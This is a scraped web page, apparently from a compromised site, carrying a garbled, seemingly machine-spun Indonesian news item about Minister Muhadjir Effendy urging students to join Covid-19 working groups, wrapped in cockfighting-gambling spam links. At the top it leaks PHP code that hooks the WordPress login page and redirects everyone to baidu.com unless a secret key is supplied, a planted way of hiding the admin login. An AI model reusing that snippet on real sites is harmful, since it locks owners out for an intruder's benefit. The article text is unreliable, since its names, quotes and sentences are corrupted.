//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Menteri Koordinator PMK mengajak mahasiswa untuk bergabung dalam working group Covid-19 | adu ayam bali_s128.net login_s128.live

Menteri Koordinator PMK mengajak mahasiswa untuk bergabung dalam working group Covid-19

Reporter Tribunnews.com Fahdi Fahlevi (Fahdi Fahlevi) lapor-Menteri Koordinator Pembangunan Manusia dan Kebudayaan Muhadjir Effendy Jakarta TRIBUNNEWS.COM mengungkapkan, pelajar bisa banyak berperan dalam menyikapi pandemi Covid-19 di Indonesia.

Muhadjir Selama ini, pemerintah memperbolehkan mahasiswa untuk mengikuti berbagai kegiatan dalam menanggapi pandemi Covid-19. “Masalah ini sangat serius,” kata Muhadjir dalam webinar yang diselenggarakan UMY, Senin (28/9/2020).

Baca: Menteri Koordinator PMK Muhadjir Effendy: Narasumber dan guru penerima pertama vaksin Covid-19

Menurut Muhadjir, peran siswa sangat penting dalam mensosialisasikan perjanjian kesehatan kepada masyarakat .

Mahasiswa perlu memberikan pengetahuan terkait pengguna, masker, kewajiban mencuci tangan, dan menghindari keramaian .

Baca: Pandemi Covid-19 secara tidak langsung mendorong transformasi digital

Muhadjir mengatakan: Pembagian masker sekarang proses pendistribusian masker di berbagai daerah, dan kami melibatkan siswa. ”Mantan Menteri Pendidikan dan Kebudayaan itu mengajak para siswa untuk bergabung dalam kelompok kerja Covid-19 di daerahnya masing-masing. Menghubungi pokja Covid di berbagai tempat, pu menanyakan kepada Menko apa yang dikatakannya. Jika demikian, saya ingin berperan. Misalnya, Muhajdi mengatakan bahwa siswa dapat mengumpulkan berbagai sembako dan membagikannya kepada yang membutuhkan.

Leave a comment

adu ayam bali_s128.net login_s128.live